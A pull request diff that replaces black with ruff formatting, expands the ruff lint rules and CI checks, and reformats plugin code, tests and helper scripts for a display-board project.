### PR TITLE
chore: tighten Python linting (ruff format + expanded rule set + CI)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -42,6 +42,7 @@ jobs:
               - 'Dockerfile'
               - 'start-dev.sh'
               - 'tests/**'
+              - 'scripts/**'
               - 'pyproject.toml'
             ui:
               - 'web/**'
@@ -129,12 +130,12 @@ jobs:
       run: |
         ruff --version
         # Config is in pyproject.toml [tool.ruff].
-        ruff check src/ plugins/
+        ruff check src/ plugins/ tests/ scripts/
 
-    - name: Check code formatting (basic syntax check)
+    - name: Check formatting with ruff
       run: |
-        find src -name "*.py" -exec python -m py_compile {} \;
-        echo "✅ All Python files compile successfully"
+        # ruff format replaces black; same output, one tool.
+        ruff format --check src/ plugins/ tests/ scripts/
     
     - name: Run platform tests with coverage
       run: |

--- a/plugins/_template/__init__.py
+++ b/plugins/_template/__init__.py
@@ -53,10 +53,7 @@ class MyPlugin(PluginBase):
             api_key = os.getenv("MY_PLUGIN_API_KEY")
 
         if not api_key:
-            return PluginResult(
-                available=False,
-                error="API key not configured"
-            )
+            return PluginResult(available=False, error="API key not configured")
 
         try:
             # TODO: Implement your data fetching logic here
@@ -76,18 +73,11 @@ class MyPlugin(PluginBase):
                 ],
             }
 
-            return PluginResult(
-                available=True,
-                data=example_data,
-                formatted_lines=self._format_display(example_data)
-            )
+            return PluginResult(available=True, data=example_data, formatted_lines=self._format_display(example_data))
 
         except Exception as e:
             logger.error(f"Error fetching data: {e}", exc_info=True)
-            return PluginResult(
-                available=False,
-                error=str(e)
-            )
+            return PluginResult(available=False, error=str(e))
 
     def validate_config(self, config: dict[str, Any]) -> list[str]:
         """
@@ -173,4 +163,3 @@ class MyPlugin(PluginBase):
     #                                                         # trigger_page_id is set
     #         )
     #     ]
-

--- a/plugins/_template/tests/__init__.py
+++ b/plugins/_template/tests/__init__.py
@@ -1,2 +1,1 @@
 """Tests for the template plugin."""
-

--- a/plugins/_template/tests/conftest.py
+++ b/plugins/_template/tests/conftest.py
@@ -19,4 +19,3 @@ def reset_plugin_singletons():
 def mock_api_response():
     """Fixture to create mock API responses."""
     return create_mock_response
-

--- a/plugins/_template/tests/test_plugin.py
+++ b/plugins/_template/tests/test_plugin.py
@@ -80,8 +80,7 @@ class TestTemplateManifestMetadata:
     def test_all_variables_have_descriptions(self, manifest_data):
         simple = manifest_data["variables"]["simple"]
         for var_name, meta in simple.items():
-            assert "description" in meta and meta["description"], \
-                f"Variable '{var_name}' missing description"
+            assert meta.get("description"), f"Variable '{var_name}' missing description"
 
     def test_groups_are_defined(self, manifest_data):
         groups = manifest_data["variables"].get("groups", {})
@@ -95,8 +94,7 @@ class TestTemplateManifestMetadata:
         for var_name, meta in simple.items():
             group = meta.get("group", "")
             if group:
-                assert group in groups, \
-                    f"Variable '{var_name}' references undefined group '{group}'"
+                assert group in groups, f"Variable '{var_name}' references undefined group '{group}'"
 
     def test_manifest_has_arrays(self, manifest_data):
         arrays = manifest_data["variables"].get("arrays", {})

--- a/plugins/countdown/__init__.py
+++ b/plugins/countdown/__init__.py
@@ -46,10 +46,7 @@ class CountdownPlugin(PluginBase):
             try:
                 datetime.fromisoformat(target)
             except (ValueError, TypeError):
-                errors.append(
-                    f"Invalid target datetime format: {target}. "
-                    "Use ISO format (e.g., 2025-06-15T00:00:00)"
-                )
+                errors.append(f"Invalid target datetime format: {target}. Use ISO format (e.g., 2025-06-15T00:00:00)")
 
         return errors
 
@@ -60,9 +57,7 @@ class CountdownPlugin(PluginBase):
             tz = ZoneInfo(timezone_str)
             now = datetime.now(tz)
 
-            target_str = self.config.get("target_datetime") or os.getenv(
-                "COUNTDOWN_TARGET"
-            )
+            target_str = self.config.get("target_datetime") or os.getenv("COUNTDOWN_TARGET")
             if not target_str:
                 return PluginResult(
                     available=False,
@@ -83,11 +78,7 @@ class CountdownPlugin(PluginBase):
             else:
                 target = target_naive
 
-            event_name = (
-                self.config.get("event_name")
-                or os.getenv("COUNTDOWN_EVENT_NAME")
-                or "Event"
-            )
+            event_name = self.config.get("event_name") or os.getenv("COUNTDOWN_EVENT_NAME") or "Event"
 
             delta = target - now
             total_seconds = int(delta.total_seconds())

--- a/plugins/countdown/tests/test_plugin.py
+++ b/plugins/countdown/tests/test_plugin.py
@@ -292,8 +292,7 @@ class TestCountdownManifestMetadata:
 
         simple = manifest["variables"]["simple"]
         for var_name, meta in simple.items():
-            assert "description" in meta and meta["description"], \
-                f"Variable '{var_name}' missing description"
+            assert meta.get("description"), f"Variable '{var_name}' missing description"
 
     def test_all_variables_have_valid_groups(self):
         """Every variable references a group that is defined."""
@@ -306,8 +305,7 @@ class TestCountdownManifestMetadata:
         for var_name, meta in simple.items():
             group = meta.get("group", "")
             if group:
-                assert group in groups, \
-                    f"Variable '{var_name}' references undefined group '{group}'"
+                assert group in groups, f"Variable '{var_name}' references undefined group '{group}'"
 
     def test_groups_are_defined(self):
         """Manifest defines variable groups."""

--- a/plugins/date_time/__init__.py
+++ b/plugins/date_time/__init__.py
@@ -13,14 +13,41 @@ from src.plugins.base import PluginBase, PluginResult
 logger = logging.getLogger(__name__)
 
 _HOUR_WORDS = {
-    1: "ONE", 2: "TWO", 3: "THREE", 4: "FOUR", 5: "FIVE", 6: "SIX",
-    7: "SEVEN", 8: "EIGHT", 9: "NINE", 10: "TEN", 11: "ELEVEN", 12: "TWELVE",
+    1: "ONE",
+    2: "TWO",
+    3: "THREE",
+    4: "FOUR",
+    5: "FIVE",
+    6: "SIX",
+    7: "SEVEN",
+    8: "EIGHT",
+    9: "NINE",
+    10: "TEN",
+    11: "ELEVEN",
+    12: "TWELVE",
 }
 
 _ONES = [
-    "", "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT",
-    "NINE", "TEN", "ELEVEN", "TWELVE", "THIRTEEN", "FOURTEEN", "FIFTEEN",
-    "SIXTEEN", "SEVENTEEN", "EIGHTEEN", "NINETEEN",
+    "",
+    "ONE",
+    "TWO",
+    "THREE",
+    "FOUR",
+    "FIVE",
+    "SIX",
+    "SEVEN",
+    "EIGHT",
+    "NINE",
+    "TEN",
+    "ELEVEN",
+    "TWELVE",
+    "THIRTEEN",
+    "FOURTEEN",
+    "FIFTEEN",
+    "SIXTEEN",
+    "SEVENTEEN",
+    "EIGHTEEN",
+    "NINETEEN",
 ]
 _TENS = ["", "", "TWENTY", "THIRTY", "FORTY", "FIFTY"]
 
@@ -56,14 +83,13 @@ def _time_to_english(hour: int, minute: int) -> str:
 
     if minute == 0:
         return f"IT'S {_HOUR_WORDS[h12]} O'CLOCK {period}."
-    elif minute == 30:
+    if minute == 30:
         return f"IT'S HALF PAST {_HOUR_WORDS[h12]} {period}."
-    elif minute < 30:
+    if minute < 30:
         return f"IT'S {_minute_word(minute)} PAST {_HOUR_WORDS[h12]} {period}."
-    else:
-        minutes_to = 60 - minute
-        next_h12 = h12 % 12 + 1
-        return f"IT'S {_minute_word(minutes_to)} TO {_HOUR_WORDS[next_h12]} {period}."
+    minutes_to = 60 - minute
+    next_h12 = h12 % 12 + 1
+    return f"IT'S {_minute_word(minutes_to)} TO {_HOUR_WORDS[next_h12]} {period}."
 
 
 class DateTimePlugin(PluginBase):
@@ -101,6 +127,7 @@ class DateTimePlugin(PluginBase):
             timezone_str = self.config.get("timezone")
             if not timezone_str:
                 from src.config import Config
+
                 timezone_str = Config.GENERAL_TIMEZONE or "America/Los_Angeles"
             tz = ZoneInfo(timezone_str)
             now = datetime.now(tz)
@@ -117,38 +144,29 @@ class DateTimePlugin(PluginBase):
                 "year": str(now.year),
                 "hour": str(now.hour),
                 "minute": str(now.minute).zfill(2),
-
                 # New time formats
-                "time_12h": now.strftime("%I:%M %p").lstrip("0"),  # 12-hour format without leading zero from hour, e.g., "2:30 PM"
+                "time_12h": now.strftime("%I:%M %p").lstrip(
+                    "0"
+                ),  # 12-hour format without leading zero from hour, e.g., "2:30 PM"
                 "time_24h": now.strftime("%H:%M"),  # Same as "time" but explicit
-
                 # New date formats (US format)
                 "date_us": now.strftime("%m/%d/%Y"),  # MM/DD/YYYY
                 "date_us_short": now.strftime("%m/%d/%y"),  # MM/DD/YY
-
                 # New month formats
                 "month_number": str(now.month),  # 1-12 (unpadded)
                 "month_number_padded": now.strftime("%m"),  # 01-12 (zero-padded)
                 "month_abbr": now.strftime("%b"),  # 3-letter abbreviation (Jan, Feb, etc.)
-
                 # Additional timezone info
                 "timezone": timezone_str,  # Full timezone name from config
-
                 # Spoken English time expression
                 "time_english": _time_to_english(now.hour, now.minute),
             }
 
-            return PluginResult(
-                available=True,
-                data=data
-            )
+            return PluginResult(available=True, data=data)
 
         except Exception as e:
             logger.exception("Error fetching datetime data")
-            return PluginResult(
-                available=False,
-                error=str(e)
-            )
+            return PluginResult(available=False, error=str(e))
 
     def get_formatted_display(self) -> list[str] | None:
         """Return default formatted datetime display."""
@@ -157,7 +175,7 @@ class DateTimePlugin(PluginBase):
             return None
 
         data = result.data
-        lines = [
+        return [
             "",
             data["day_of_week"].upper().center(22),
             data["date"].center(22),
@@ -166,9 +184,6 @@ class DateTimePlugin(PluginBase):
             "",
         ]
 
-        return lines
-
 
 # Export the plugin class
 Plugin = DateTimePlugin
-

--- a/plugins/date_time/tests/__init__.py
+++ b/plugins/date_time/tests/__init__.py
@@ -1,2 +1,1 @@
 """Tests for the datetime plugin."""
-

--- a/plugins/date_time/tests/conftest.py
+++ b/plugins/date_time/tests/conftest.py
@@ -31,7 +31,4 @@ def sample_manifest():
 @pytest.fixture
 def sample_config():
     """Sample configuration for testing."""
-    return {
-        "enabled": True,
-        "timezone": "America/Los_Angeles"
-    }
+    return {"enabled": True, "timezone": "America/Los_Angeles"}

--- a/plugins/date_time/tests/test_plugin.py
+++ b/plugins/date_time/tests/test_plugin.py
@@ -54,7 +54,7 @@ class TestDateTimePlugin:
         # Should use default and be valid
         assert len(errors) == 0
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_all_variables(self, mock_datetime, sample_manifest, sample_config):
         """Test fetch_data returns all expected variables."""
         # Mock datetime to return a specific date/time
@@ -95,7 +95,7 @@ class TestDateTimePlugin:
         assert "month_abbr" in data
         assert "timezone" in data
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_time_formats(self, mock_datetime, sample_manifest, sample_config):
         """Test time format variables."""
         # Test at 2:30 PM (14:30)
@@ -112,7 +112,7 @@ class TestDateTimePlugin:
         assert result.data["time"] == "14:30"  # Should match time_24h
         assert result.data["time_12h"] == "2:30 PM"  # Leading zero removed
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_time_formats_midnight(self, mock_datetime, sample_manifest, sample_config):
         """Test time formats at midnight (12:00 AM)."""
         mock_now = datetime(2025, 1, 15, 0, 0, 0)
@@ -127,7 +127,7 @@ class TestDateTimePlugin:
         assert result.data["time_24h"] == "00:00"
         assert result.data["time_12h"] == "12:00 AM"
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_time_formats_noon(self, mock_datetime, sample_manifest, sample_config):
         """Test time formats at noon (12:00 PM)."""
         mock_now = datetime(2025, 1, 15, 12, 0, 0)
@@ -142,7 +142,7 @@ class TestDateTimePlugin:
         assert result.data["time_24h"] == "12:00"
         assert result.data["time_12h"] == "12:00 PM"
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_date_formats(self, mock_datetime, sample_manifest, sample_config):
         """Test US date format variables."""
         mock_now = datetime(2025, 1, 15, 14, 30, 0)
@@ -158,7 +158,7 @@ class TestDateTimePlugin:
         assert result.data["date_us"] == "01/15/2025"
         assert result.data["date_us_short"] == "01/15/25"
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_month_formats(self, mock_datetime, sample_manifest, sample_config):
         """Test month format variables."""
         # Test January (month 1)
@@ -187,7 +187,7 @@ class TestDateTimePlugin:
         assert result.data["month_number_padded"] == "12"
         assert result.data["month_abbr"] == "Dec"
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_timezone_info(self, mock_datetime, sample_manifest, sample_config):
         """Test timezone-related variables."""
         mock_now = datetime(2025, 1, 15, 14, 30, 0)
@@ -205,7 +205,7 @@ class TestDateTimePlugin:
         assert result.data["timezone"] == "America/New_York"
         assert "timezone_abbr" in result.data  # Should have abbreviation like "EST" or "EDT"
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_day_of_week(self, mock_datetime, sample_manifest, sample_config):
         """Test day of week variable."""
         # Wednesday
@@ -222,7 +222,7 @@ class TestDateTimePlugin:
         assert result.data["day"] == "15"
         assert result.data["year"] == "2025"
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_fetch_data_variables_match_manifest(self, mock_datetime, sample_manifest, sample_config):
         """Test that fetch_data() output keys match the manifest-declared variables."""
         mock_now = datetime(2025, 1, 15, 14, 30, 0)
@@ -257,7 +257,7 @@ class TestDateTimePlugin:
 
     def test_fetch_data_default_timezone(self, sample_manifest):
         """Test fetch_data falls back to LA when neither plugin nor general timezone is set."""
-        with patch('src.config.Config') as mock_config:
+        with patch("src.config.Config") as mock_config:
             mock_config.GENERAL_TIMEZONE = ""
             plugin = DateTimePlugin(sample_manifest)
             plugin.config = {"enabled": True}  # No timezone in config
@@ -269,7 +269,7 @@ class TestDateTimePlugin:
 
     def test_fetch_data_uses_general_timezone(self, sample_manifest):
         """Test fetch_data falls back to general/profile timezone when plugin timezone is not set."""
-        with patch('src.config.Config') as mock_config:
+        with patch("src.config.Config") as mock_config:
             mock_config.GENERAL_TIMEZONE = "America/Denver"
             plugin = DateTimePlugin(sample_manifest)
             plugin.config = {"enabled": True}  # No plugin-specific timezone
@@ -279,7 +279,7 @@ class TestDateTimePlugin:
         assert result.data is not None
         assert result.data["timezone"] == "America/Denver"
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_get_formatted_display(self, mock_datetime, sample_manifest, sample_config):
         """Test formatted display output."""
         mock_now = datetime(2025, 1, 15, 14, 30, 0)
@@ -297,7 +297,7 @@ class TestDateTimePlugin:
         assert "2025-01-15" in lines[2]  # Date should be centered
         assert "14:30" in lines[3]  # Time should be centered
 
-    @patch('plugins.date_time.datetime')
+    @patch("plugins.date_time.datetime")
     def test_get_formatted_display_fetch_fails(self, mock_datetime, sample_manifest):
         """Test formatted display when fetch_data fails."""
         mock_datetime.now.side_effect = Exception("Test error")
@@ -329,8 +329,7 @@ class TestDateTimeManifestMetadata:
 
         simple = manifest["variables"]["simple"]
         for var_name, meta in simple.items():
-            assert "description" in meta and meta["description"], \
-                f"Variable '{var_name}' missing description"
+            assert meta.get("description"), f"Variable '{var_name}' missing description"
 
     def test_all_variables_have_valid_groups(self):
         """Every variable references a group that is defined."""
@@ -343,8 +342,7 @@ class TestDateTimeManifestMetadata:
         for var_name, meta in simple.items():
             group = meta.get("group", "")
             if group:
-                assert group in groups, \
-                    f"Variable '{var_name}' references undefined group '{group}'"
+                assert group in groups, f"Variable '{var_name}' references undefined group '{group}'"
 
     def test_groups_are_defined(self):
         """Manifest defines variable groups."""
@@ -365,10 +363,25 @@ class TestDateTimeManifestMetadata:
 
         simple = manifest["variables"]["simple"]
         expected = [
-            "time", "date", "datetime", "day", "day_of_week", "month",
-            "year", "hour", "minute", "timezone_abbr", "time_12h", "time_24h",
-            "date_us", "date_us_short", "month_number", "month_number_padded",
-            "month_abbr", "timezone", "time_english",
+            "time",
+            "date",
+            "datetime",
+            "day",
+            "day_of_week",
+            "month",
+            "year",
+            "hour",
+            "minute",
+            "timezone_abbr",
+            "time_12h",
+            "time_24h",
+            "date_us",
+            "date_us_short",
+            "month_number",
+            "month_number_padded",
+            "month_abbr",
+            "timezone",
+            "time_english",
         ]
         for var in expected:
             assert var in simple, f"Expected variable '{var}' not in manifest"

--- a/plugins/random/__init__.py
+++ b/plugins/random/__init__.py
@@ -17,8 +17,7 @@ BOARD_COLORS = ["red", "orange", "yellow", "green", "blue", "violet"]
 # Maps color names to board character codes; used to produce color tiles.
 # White (69) and black (70) are excluded: they render inverted on white boards,
 # making color_name misleading (a "black" tile appears white on a white board).
-_COLOR_TILE_CODES = {"red": 63, "orange": 64, "yellow": 65, "green": 66,
-                     "blue": 67, "violet": 68}
+_COLOR_TILE_CODES = {"red": 63, "orange": 64, "yellow": 65, "green": 66, "blue": 67, "violet": 68}
 
 _DEFAULT_CHOICES = ["Heads", "Tails"]
 

--- a/plugins/random/tests/test_plugin.py
+++ b/plugins/random/tests/test_plugin.py
@@ -146,7 +146,7 @@ class TestRandomPlugin:
         for _ in range(20):
             result = plugin.fetch_data()
             tile = result.data["color"]
-            assert re.match(r'^\{\d+\}$', tile), f"color {tile!r} not in {{N}} format"
+            assert re.match(r"^\{\d+\}$", tile), f"color {tile!r} not in {{N}} format"
 
     def test_fetch_data_color_tile_valid_code(self, sample_manifest, sample_config):
         plugin = RandomPlugin(sample_manifest)
@@ -158,6 +158,7 @@ class TestRandomPlugin:
 
     def test_fetch_data_color_tile_matches_color_name(self, sample_manifest, sample_config):
         from plugins.random import _COLOR_TILE_CODES
+
         plugin = RandomPlugin(sample_manifest)
         plugin.config = sample_config
         for _ in range(20):
@@ -229,8 +230,7 @@ class TestRandomManifest:
     def test_manifest_variables_have_descriptions(self, random_manifest):
         simple = random_manifest["variables"]["simple"]
         for var_name, meta in simple.items():
-            assert "description" in meta and meta["description"], \
-                f"Variable '{var_name}' missing description"
+            assert meta.get("description"), f"Variable '{var_name}' missing description"
 
     def test_manifest_variables_reference_valid_groups(self, random_manifest):
         groups = set(random_manifest["variables"].get("groups", {}).keys())
@@ -238,8 +238,7 @@ class TestRandomManifest:
         for var_name, meta in simple.items():
             group = meta.get("group", "")
             if group:
-                assert group in groups, \
-                    f"Variable '{var_name}' references undefined group '{group}'"
+                assert group in groups, f"Variable '{var_name}' references undefined group '{group}'"
 
     def test_manifest_has_demo(self, random_manifest):
         assert "demo" in random_manifest

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -39,7 +39,6 @@ dev = [
     "pytest-asyncio>=0.24.0",
     "pytest-xdist>=3.6.0",
     "coverage>=7.6.0",
-    "black>=24.10.0",
     "ruff>=0.9.0",
 ]
 
@@ -110,42 +109,51 @@ output = "coverage/coverage.xml"
 line-length = 120
 target-version = "py311"
 
+[tool.ruff.format]
+# Use ruff's built-in formatter (Black-compatible). Replaces black entirely;
+# fewer tools, same output.
+quote-style = "double"
+indent-style = "space"
+line-ending = "lf"
+
 [tool.ruff.lint]
 select = [
-    "E",   # pycodestyle errors
-    "W",   # pycodestyle warnings
-    "F",   # pyflakes
-    "I",   # isort
-    "B",   # flake8-bugbear
-    "C4",  # flake8-comprehensions
-    "UP",  # pyupgrade
+    "E",    # pycodestyle errors
+    "W",    # pycodestyle warnings
+    "F",    # pyflakes
+    "I",    # isort
+    "B",    # flake8-bugbear
+    "C4",   # flake8-comprehensions
+    "UP",   # pyupgrade
+    "SIM",  # flake8-simplify
+    "RUF",  # ruff-specific
+    "PIE",  # flake8-pie
+    "RET",  # flake8-return
+    "PTH",  # flake8-use-pathlib
+    "TID",  # flake8-tidy-imports
 ]
 ignore = [
-    "E501",  # line too long (handled by formatter)
-    "B008",  # do not perform function calls in argument defaults
+    "E501",    # line too long (handled by formatter)
+    "B008",    # do not perform function calls in argument defaults
+    "SIM108",  # ternary instead of if-else — sometimes the if/else is more readable
+    "RUF012",  # mutable class attributes need ClassVar — too noisy for plugin authors
+    # Em-dashes / curly quotes / ellipses appear deliberately in docstrings,
+    # CLI help text, and user-facing strings. Flagging them as ambiguous
+    # produces too much noise.
+    "RUF001",  # ambiguous-unicode-character-string
+    "RUF002",  # ambiguous-unicode-character-docstring
+    "RUF003",  # ambiguous-unicode-character-comment
 ]
 
 [tool.ruff.lint.per-file-ignores]
 "__init__.py" = ["F401"]  # Allow unused imports in __init__.py
-"tests/**" = ["B008"]  # Allow function calls in argument defaults in tests
-"plugins/**/tests/**" = ["B008"]  # Allow function calls in argument defaults in plugin tests
-
-[tool.black]
-line-length = 120
-target-version = ["py311"]
-include = '\.pyi?$'
-extend-exclude = '''
-/(
-  # directories
-  \.git
-  | \.hg
-  | \.mypy_cache
-  | \.tox
-  | \.venv
-  | _build
-  | buck-out
-  | build
-  | dist
-  | node_modules
-)/
-'''
+"tests/**" = [
+    "B008",    # function calls in argument defaults
+    "PTH",     # tests use os.path freely; not worth porting
+    "SIM117",  # nested `with` is often clearer in tests
+]
+"plugins/**/tests/**" = ["B008", "PTH", "SIM117"]
+"scripts/**" = [
+    "PTH",  # CLI scripts use os.path freely
+    "T201", # allow print()
+]

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -115,6 +115,15 @@ target-version = "py311"
 quote-style = "double"
 indent-style = "space"
 line-ending = "lf"
+exclude = [
+    # CodeQL data-flow barriers in these files are sensitive to line/scope
+    # changes (e.g. py/path-injection, py/full-ssrf). Reformatting shifts
+    # alert line numbers and can cause CodeQL's PR-diff analysis to
+    # mis-classify pre-existing alerts as new. Pin them at the upstream
+    # layout; fix bigger refactors in a dedicated security PR.
+    "src/plugins/sources.py",
+    "src/api_server.py",
+]
 
 [tool.ruff.lint]
 select = [
@@ -157,3 +166,8 @@ ignore = [
     "PTH",  # CLI scripts use os.path freely
     "T201", # allow print()
 ]
+# CodeQL-sensitive files: see the matching [tool.ruff.format].exclude entry
+# above for the rationale. Any rule fix here would shift line numbers and
+# re-trigger CodeQL's "new alert" false positives on pre-existing findings.
+"src/plugins/sources.py" = ["PTH", "SIM", "RET", "PIE"]
+"src/api_server.py" = ["PTH", "SIM", "RET", "PIE", "RUF010", "RUF013", "RUF100"]

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -170,4 +170,4 @@ ignore = [
 # above for the rationale. Any rule fix here would shift line numbers and
 # re-trigger CodeQL's "new alert" false positives on pre-existing findings.
 "src/plugins/sources.py" = ["PTH", "SIM", "RET", "PIE"]
-"src/api_server.py" = ["PTH", "SIM", "RET", "PIE", "RUF010", "RUF013", "RUF100"]
+"src/api_server.py" = ["PTH", "SIM", "RET", "PIE", "RUF010", "RUF013", "RUF059", "RUF100"]

--- a/scripts/create_test_schedule.py
+++ b/scripts/create_test_schedule.py
@@ -4,7 +4,7 @@ Create test schedules that trigger right now for manual testing.
 
 This script creates schedules that:
 1. Start now and run for 5 minutes
-2. Start in 5 minutes and run for 5 minutes  
+2. Start in 5 minutes and run for 5 minutes
 3. Start in 10 minutes and run for 5 minutes
 
 This allows you to manually verify that schedule switching works in real-time.
@@ -14,9 +14,10 @@ Usage:
 """
 
 import argparse
-import requests
-from datetime import datetime, timedelta
 import sys
+from datetime import datetime, timedelta
+
+import requests
 
 
 def get_current_time_info():
@@ -42,12 +43,12 @@ def create_schedule(api_url: str, page_id: str, start_time: str, end_time: str, 
         "end_time": end_time,
         "day_pattern": "custom",
         "custom_days": [day],
-        "enabled": True
+        "enabled": True,
     }
-    
+
     response = requests.post(f"{api_url}/schedules", json=schedule_data)
     response.raise_for_status()
-    
+
     return response.json()
 
 
@@ -55,106 +56,85 @@ def main():
     parser = argparse.ArgumentParser(description="Create test schedules for manual verification")
     parser.add_argument("--api-url", default="http://localhost:4420/api", help="API URL")
     args = parser.parse_args()
-    
+
     print("🔧 Creating test schedules for schedule switching verification...\n")
-    
+
     # Get current time
     now, current_day = get_current_time_info()
     print(f"Current time: {now.strftime('%H:%M')} on {current_day}")
     print(f"API URL: {args.api_url}\n")
-    
+
     # Fetch available pages
     try:
         pages_response = requests.get(f"{args.api_url}/pages")
         pages_response.raise_for_status()
         pages = pages_response.json()["pages"]
-        
+
         if len(pages) < 3:
             print(f"❌ Error: Need at least 3 pages. Found {len(pages)}. Create more pages first.")
             sys.exit(1)
-        
+
         print(f"✅ Found {len(pages)} pages:")
         for i, page in enumerate(pages[:3]):
-            print(f"   {i+1}. {page['name']} (ID: {page['id']})")
+            print(f"   {i + 1}. {page['name']} (ID: {page['id']})")
         print()
-        
+
     except requests.exceptions.RequestException as e:
         print(f"❌ Error fetching pages: {e}")
         print("   Make sure the API server is running.")
         sys.exit(1)
-    
+
     # Create 3 test schedules
     schedules = []
-    
+
     # Schedule 1: Now -> 5 minutes
     start1 = now
     end1 = now + timedelta(minutes=5)
     start1_str = format_time(start1)
     end1_str = format_time(end1)
-    
+
     print(f"Creating Schedule 1: {pages[0]['name']}")
     print(f"  Time: {start1_str} - {end1_str} (starting NOW)")
-    
+
     try:
-        schedule1 = create_schedule(
-            args.api_url,
-            pages[0]["id"],
-            start1_str,
-            end1_str,
-            current_day,
-            "Now"
-        )
+        schedule1 = create_schedule(args.api_url, pages[0]["id"], start1_str, end1_str, current_day, "Now")
         schedules.append(schedule1)
         print(f"  ✅ Created schedule {schedule1['id']}\n")
     except requests.exceptions.RequestException as e:
         print(f"  ❌ Error: {e}\n")
-    
+
     # Schedule 2: 5 minutes -> 10 minutes
     start2 = now + timedelta(minutes=5)
     end2 = now + timedelta(minutes=10)
     start2_str = format_time(start2)
     end2_str = format_time(end2)
-    
+
     print(f"Creating Schedule 2: {pages[1]['name']}")
     print(f"  Time: {start2_str} - {end2_str} (in 5 minutes)")
-    
+
     try:
-        schedule2 = create_schedule(
-            args.api_url,
-            pages[1]["id"],
-            start2_str,
-            end2_str,
-            current_day,
-            "In 5 min"
-        )
+        schedule2 = create_schedule(args.api_url, pages[1]["id"], start2_str, end2_str, current_day, "In 5 min")
         schedules.append(schedule2)
         print(f"  ✅ Created schedule {schedule2['id']}\n")
     except requests.exceptions.RequestException as e:
         print(f"  ❌ Error: {e}\n")
-    
+
     # Schedule 3: 10 minutes -> 15 minutes
     start3 = now + timedelta(minutes=10)
     end3 = now + timedelta(minutes=15)
     start3_str = format_time(start3)
     end3_str = format_time(end3)
-    
+
     print(f"Creating Schedule 3: {pages[2]['name']}")
     print(f"  Time: {start3_str} - {end3_str} (in 10 minutes)")
-    
+
     try:
-        schedule3 = create_schedule(
-            args.api_url,
-            pages[2]["id"],
-            start3_str,
-            end3_str,
-            current_day,
-            "In 10 min"
-        )
+        schedule3 = create_schedule(args.api_url, pages[2]["id"], start3_str, end3_str, current_day, "In 10 min")
         schedules.append(schedule3)
         print(f"  ✅ Created schedule {schedule3['id']}\n")
     except requests.exceptions.RequestException as e:
         print(f"  ❌ Error: {e}\n")
-    
+
     # Enable schedule mode
     print("Enabling schedule mode...")
     try:
@@ -163,7 +143,7 @@ def main():
         print("✅ Schedule mode enabled\n")
     except requests.exceptions.RequestException as e:
         print(f"❌ Error enabling schedule mode: {e}\n")
-    
+
     # Summary
     print("=" * 60)
     print("📅 TEST SCHEDULES CREATED")
@@ -173,10 +153,10 @@ def main():
     print(f"  {start1_str} - {end1_str}  →  {pages[0]['name']} (NOW)")
     print(f"  {start2_str} - {end2_str}  →  {pages[1]['name']} (in ~5 min)")
     print(f"  {start3_str} - {end3_str}  →  {pages[2]['name']} (in ~10 min)")
-    print(f"\n🔄 The UI will refresh every 60 seconds")
-    print(f"🎯 Watch the home page to see pages switch automatically")
-    print(f"\n⚠️  Note: Switches may be delayed up to 60 seconds due to polling")
-    print(f"\n🗑️  To clean up: Delete these schedules from the Schedule page")
+    print("\n🔄 The UI will refresh every 60 seconds")
+    print("🎯 Watch the home page to see pages switch automatically")
+    print("\n⚠️  Note: Switches may be delayed up to 60 seconds due to polling")
+    print("\n🗑️  To clean up: Delete these schedules from the Schedule page")
     print("=" * 60)
 
 

--- a/scripts/export-brand-assets.py
+++ b/scripts/export-brand-assets.py
@@ -61,9 +61,7 @@ def main():
             )
             page.goto(url, wait_until="networkidle")
             # Wait for Geist font to load
-            page.wait_for_function(
-                "document.fonts.check('900 36px Geist') && document.fonts.check('300 36px Geist')"
-            )
+            page.wait_for_function("document.fonts.check('900 36px Geist') && document.fonts.check('300 36px Geist')")
 
             for variant in ("light", "dark"):
                 el = page.locator(f"#{variant}-lockup")

--- a/scripts/extract_plugin.py
+++ b/scripts/extract_plugin.py
@@ -23,12 +23,10 @@ Exit codes:
 
 import argparse
 import json
-import os
 import shutil
 import subprocess
 import sys
 from pathlib import Path
-from typing import Optional
 
 # ---------------------------------------------------------------------------
 # Constants
@@ -114,11 +112,12 @@ Thumbs.db
 # Helpers
 # ---------------------------------------------------------------------------
 
+
 def log(msg: str) -> None:
     print(msg, flush=True)
 
 
-def run(cmd: list[str], cwd: Optional[Path] = None, check: bool = True) -> subprocess.CompletedProcess:
+def run(cmd: list[str], cwd: Path | None = None, check: bool = True) -> subprocess.CompletedProcess:
     """Run a command, streaming output to stdout."""
     return subprocess.run(cmd, cwd=cwd, check=check, text=True)
 
@@ -135,7 +134,7 @@ def repo_name_to_url(repo_name: str) -> str:
 def load_registry() -> dict:
     if not REGISTRY_FILE.exists():
         return {"version": "1.0.0", "plugins": []}
-    with open(REGISTRY_FILE, "r", encoding="utf-8") as f:
+    with open(REGISTRY_FILE, encoding="utf-8") as f:
         return json.load(f)
 
 
@@ -151,7 +150,7 @@ def registry_has_plugin(data: dict, plugin_id: str) -> bool:
 
 def load_plugin_manifest(plugin_dir: Path) -> dict:
     manifest_path = plugin_dir / "manifest.json"
-    with open(manifest_path, "r", encoding="utf-8") as f:
+    with open(manifest_path, encoding="utf-8") as f:
         return json.load(f)
 
 
@@ -159,7 +158,8 @@ def gh_repo_exists(repo_name: str) -> bool:
     """Return True if the GitHub repo already exists."""
     result = subprocess.run(
